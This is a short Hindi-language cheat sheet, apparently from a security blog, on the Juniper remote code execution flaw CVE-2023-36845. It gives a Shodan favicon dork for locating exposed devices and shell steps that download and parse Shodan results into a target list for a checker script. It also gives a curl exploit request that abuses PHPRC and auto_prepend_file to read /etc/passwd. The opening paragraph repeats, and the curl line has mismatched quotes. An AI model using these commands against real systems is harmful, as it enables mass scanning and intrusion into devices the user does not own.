
Juniper RCE (रिमोट कोड निष्पादन) CVE-2023-36845 एक भेद्यता है जो Juniper के सॉफ़्टवेयर में पहचानी गई है। यह विशेष दोष रिमोट कोड निष्पादन की अनुमति देता है, जिसका अर्थ है कि एक हमलावर डिवाइस तक भौतिक पहुंच के बिना सिस्टम पर मनमाना कोड चला सकता है।
Juniper RCE (Remote Code Execution) CVE-2023-36845 एक भेद्यता है जो Juniper के सॉफ़्टवेयर में पाई गई है। यह विशेष दोष रिमोट कोड निष्पादन की अनुमति देता है, जिसका अर्थ है कि एक हमलावर डिवाइस तक भौतिक पहुंच के बिना सिस्टम पर मनमाना कोड चला सकता है।
Shodan dork: http.favicon.hash:2141724739
अधिक लक्षित खोज के लिए इसे अन्य प्रासंगिक dorks जैसे ssl प्रमाणपत्र, संगठन नाम आदि के साथ उपयोग करें।
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
